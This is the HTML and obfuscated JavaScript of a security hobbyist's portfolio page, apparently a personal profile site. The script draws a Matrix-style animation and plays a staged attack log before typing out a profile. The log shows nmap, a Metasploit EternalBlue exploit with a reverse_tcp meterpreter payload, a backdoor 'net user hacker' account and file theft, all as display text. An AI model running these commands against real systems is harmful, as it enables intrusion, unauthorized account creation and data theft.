<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <title>L4ughingc4t</title>
  <style>
    html, body {
      margin: 0; padding: 0; width: 100%; height: 100%;
      background: black; overflow: hidden;
      font-family: 'Courier New', monospace;
      color: #0F0;
    }
    canvas {
      position: fixed; top: 0; left: 0; z-index: -1;
    }
    .log, .terminal {
      position: absolute;
      font-size: 1rem;
      overflow: auto;
      display: none;
    }
    .log {
      top: 20vh;
      width: 90vw;
      height: 70vh;
      left: 5vw;
    }
    .terminal {
      background: rgba(0,0,0,0.9);
      border: 1px solid #0F0;
      padding: 2vh 2vw;
      border-radius: 10px;
      box-shadow: 0 0 2vh #0F0;
      font-size: 1.2vh;
      white-space: pre-wrap;
      top: 15vh;
      left: 10vw;
      width: 80vw;
      height: 60vh;
      z-index: 2;
    }
    .cursor {
      display: inline-block;
      width: 10px;
      height: 20px;
      background-color: #0F0;
      margin-left: 5px;
      animation: blink 1s infinite;
    }
    @keyframes blink {
      0%, 50% { opacity: 1; }
      51%, 100% { opacity: 0; }
    }
    .controls {
      position: absolute;
      top: 0;
      left: 0;
      width: 100%;
      padding: 10px;
      background: rgba(0,0,0,0.8);
      text-align: center;
      z-index: 5;
    }
    .controls a {
      color: #0F0;
      text-decoration: none;
      margin: 0 10px;
      font-family: monospace;
    }
  </style>
</head>
<body>

<div class="controls">
  <a href="https://github.com/L4ughingc4t" target="_blank">GitHub</a>
  <a href="https://x.com/L4ughingc4t" target="_blank">X</a>
</div>

<canvas id="matrixCanvas"></canvas>
<div class="log" id="logWindow"></div>
<div class="terminal" id="terminal"></div>

<audio id="typeSound" src="https://assets.mixkit.co/sfx/preview/mixkit-typewriter-click-1124.mp3"></audio>
<audio id="accessSound" src="https://assets.mixkit.co/sfx/preview/mixkit-access-granted-1489.mp3"></audio>

<script>
const _0xabb585=_0x24cf;(function(_0x23537b,_0x4b2ef3){const _0x559658=_0x24cf,_0x142fe6=_0x23537b();while(!![]){try{const _0x37d6d9=parseInt(_0x559658(0x13c))/0x1*(parseInt(_0x559658(0x15a))/0x2)+parseInt(_0x559658(0x141))/0x3+-parseInt(_0x559658(0x149))/0x4*(-parseInt(_0x559658(0x166))/0x5)+-parseInt(_0x559658(0x15f))/0x6+-parseInt(_0x559658(0x17b))/0x7+-parseInt(_0x559658(0x160))/0x8+-parseInt(_0x559658(0x15b))/0x9*(-parseInt(_0x559658(0x138))/0xa);if(_0x37d6d9===_0x4b2ef3)break;else _0x142fe6['push'](_0x142fe6['shift']());}catch(_0x4432a1){_0x142fe6['push'](_0x142fe6['shift']());}}}(_0x5373,0xa3dd6));const canvas=document[_0xabb585(0x16f)]('matrixCanvas'),ctx=canvas['getContext']('2d');canvas[_0xabb585(0x15e)]=window[_0xabb585(0x13f)],canvas['height']=window[_0xabb585(0x157)];const codeChars=_0xabb585(0x174),fontSize=0x10,columns=Math['floor'](canvas[_0xabb585(0x15e)]/fontSize),drops=Array(columns)[_0xabb585(0x159)](0x1);function drawMatrix(){const _0x2358b8=_0xabb585;ctx[_0x2358b8(0x13e)]=_0x2358b8(0x14e),ctx[_0x2358b8(0x165)](0x0,0x0,canvas[_0x2358b8(0x15e)],canvas[_0x2358b8(0x144)]),ctx[_0x2358b8(0x13e)]=_0x2358b8(0x16e),ctx[_0x2358b8(0x164)]=fontSize+_0x2358b8(0x15d);for(let _0x1a2d99=0x0;_0x1a2d99<drops[_0x2358b8(0x179)];_0x1a2d99++){const _0x2b1236=codeChars[_0x2358b8(0x139)](Math[_0x2358b8(0x15c)](Math[_0x2358b8(0x16a)]()*codeChars['length']));ctx[_0x2358b8(0x14c)](_0x2b1236,_0x1a2d99*fontSize,drops[_0x1a2d99]*fontSize);if(drops[_0x1a2d99]*fontSize>canvas[_0x2358b8(0x144)]&&Math[_0x2358b8(0x16a)]()>0.975)drops[_0x1a2d99]=0x0;drops[_0x1a2d99]++;}}function _0x24cf(_0x49f604,_0x327d47){const _0x537320=_0x5373();return _0x24cf=function(_0x24cf9f,_0x50178a){_0x24cf9f=_0x24cf9f-0x135;let _0x25fb1b=_0x537320[_0x24cf9f];return _0x25fb1b;},_0x24cf(_0x49f604,_0x327d47);}setInterval(drawMatrix,0x21),window[_0xabb585(0x153)](_0xabb585(0x14b),()=>{const _0x47edb3=_0xabb585;canvas[_0x47edb3(0x15e)]=window['innerWidth'],canvas['height']=window[_0x47edb3(0x157)];});const logWindow=document['getElementById']('logWindow'),terminal=document[_0xabb585(0x16f)](_0xabb585(0x147)),typeSound=document[_0xabb585(0x16f)](_0xabb585(0x13d)),accessSound=document[_0xabb585(0x16f)](_0xabb585(0x156)),textLines=[_0xabb585(0x13b),_0xabb585(0x170),'',_0xabb585(0x171),'Profile:',_0xabb585(0x168),_0xabb585(0x177),'',_0xabb585(0x158),_0xabb585(0x135),'-\x20Security\x20MiniCamp\x27Yamanashi\x202016','-\x20CODEBLUE\x20student\x20staff\x202016,2017',_0xabb585(0x16b),_0xabb585(0x14d),'',_0xabb585(0x16c),_0xabb585(0x137),_0xabb585(0x145),_0xabb585(0x148),_0xabb585(0x136),_0xabb585(0x148),'-\x2021th\x20WPT\x20Australia\x20side','',_0xabb585(0x17c)];function _0x5373(){const _0x595b9f=['scrollHeight','style','meterpreter[4031]:\x20Session\x201\x20opened\x20(10.0.0.1:4444\x20->\x20192.168.1.100:50777)\x20at\x202025-06-13\x2018:24:15\x20+0000','addEventListener','none','replace','accessSound','innerHeight','Activity:','fill','68726tpOYDT','72RXqMiC','floor','px\x20monospace','width','499128MOHnIj','4354224lFLMJd','split','toTimeString','play','font','fillRect','10835AtKDgv','toISOString','-\x20Security\x20engineer','scrollTop','random','-\x20CTF\x20player','-\x20poker','currentTime','#0F0','getElementById','L4ughingc4t','user@L4ughingc4t:~$\x20cat\x20profile.txt','vulnscan[4022]:\x20SMBv1\x20enabled\x20-\x20possible\x20MS17-010\x20(EternalBlue)','nmap[4021]:\x20OS\x20details:\x20Windows\x207\x20SP1','01$#%&@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz{}[]();<>/\x5c-=_+','nmap[4021]:\x20Starting\x20Nmap\x207.80\x20(\x20https://nmap.org\x20)\x20at\x202025-06-13\x2018:24\x20UTC','msfconsole[4025]:\x20set\x20RHOST\x20192.168.1.100','-\x20Poker\x20player','\x20kali\x20','length','msfconsole[4025]:\x20exploit\x20-j','8068795IhvTfa','user@L4ughingc4t:~$','nmap[4021]:\x20Discovered\x20open\x20port\x20445/tcp\x20on\x20192.168.1.100','-\x20SecurityCamp\x202017','-\x203rd\u3000\x20ASPT\x20Korea\x20side','-\x20135th\u3000WPT\x20Prime\x20Championship\u3000Paris','1387090wRuXLC','charAt','msfconsole[4025]:\x20set\x20LHOST\x2010.0.0.1','user@L4ughingc4t:~$\x20whoami','6bfUkyH','typeSound','fillStyle','innerWidth','display','1163628NyZgND','onload','msfconsole[4025]:\x20set\x20PAYLOAD\x20windows/x64/meterpreter/reverse_tcp','height','-\x203rd\u3000WPT\x20Prime\x20Taiwan\x20side','meterpreter[4031]:\x20Executed\x20shell\x20command:\x20net\x20user\x20hacker\x20P@ssw0rd\x20/add','terminal','-\x2014th\x20APT\x20Jeju\x20side','1380gNyTfT','block','resize','fillText','-\x20Rev\x20/\x20Web\x20/\x20Pwn','rgba(0,\x200,\x200,\x200.05)','innerHTML'];_0x5373=function(){return _0x595b9f;};return _0x5373();}let line=0x0,char=0x0;function type(){const _0x24ca3f=_0xabb585;line<textLines[_0x24ca3f(0x179)]?char<textLines[line]['length']?(terminal[_0x24ca3f(0x14f)]=terminal[_0x24ca3f(0x14f)][_0x24ca3f(0x155)](/<span class="cursor"><\/span>/g,''),terminal['innerHTML']+=textLines[line][_0x24ca3f(0x139)](char),char++,terminal[_0x24ca3f(0x14f)]+='<span\x20class=\x22cursor\x22></span>',typeSound[_0x24ca3f(0x16d)]=0x0,typeSound[_0x24ca3f(0x163)](),setTimeout(type,0x14+Math[_0x24ca3f(0x16a)]()*0x32)):(terminal['innerHTML']=terminal['innerHTML']['replace'](/<span class="cursor"><\/span>/g,''),terminal['innerHTML']+='\x0a',char=0x0,line++,setTimeout(type,0x190)):terminal[_0x24ca3f(0x14f)]+='<span\x20class=\x22cursor\x22></span>';}const attackLogSteps=[_0xabb585(0x175),'nmap[4021]:\x20Discovered\x20open\x20port\x2022/tcp\x20on\x20192.168.1.100',_0xabb585(0x17d),_0xabb585(0x173),_0xabb585(0x172),'msfconsole[4025]:\x20use\x20exploit/windows/smb/ms17_010_eternalblue',_0xabb585(0x176),_0xabb585(0x143),_0xabb585(0x13a),_0xabb585(0x17a),_0xabb585(0x152),'meterpreter[4031]:\x20Downloaded\x20file\x20C:\x5cUsers\x5cAdmin\x5cDocuments\x5csecret.docx',_0xabb585(0x146)];function outputAttackLogs(_0x50aa3d){const _0x3291b8=_0xabb585;logWindow[_0x3291b8(0x151)][_0x3291b8(0x140)]=_0x3291b8(0x14a);let _0x28692c=0x0;const _0x18afee=setInterval(()=>{const _0x37e857=_0x3291b8;if(_0x28692c<attackLogSteps[_0x37e857(0x179)]){const _0x490011=new Date(),_0xaf5e1a=_0x490011[_0x37e857(0x167)]()[_0x37e857(0x161)]('T')[0x0]+'\x20'+_0x490011[_0x37e857(0x162)]()['split']('\x20')[0x0],_0x286102=attackLogSteps[_0x28692c];logWindow[_0x37e857(0x14f)]+=_0xaf5e1a+_0x37e857(0x178)+_0x286102+'<br>',_0x28692c++,logWindow[_0x37e857(0x169)]=logWindow[_0x37e857(0x150)];}else{clearInterval(_0x18afee);if(_0x50aa3d)_0x50aa3d();}},0x2bc);}function startScenario(){outputAttackLogs(()=>{const _0x335b4e=_0x24cf;accessSound[_0x335b4e(0x163)](),logWindow[_0x335b4e(0x151)][_0x335b4e(0x140)]=_0x335b4e(0x154),terminal[_0x335b4e(0x151)][_0x335b4e(0x140)]=_0x335b4e(0x14a),type();});}window[_0xabb585(0x142)]=startScenario;
</script>

</body>
</html>
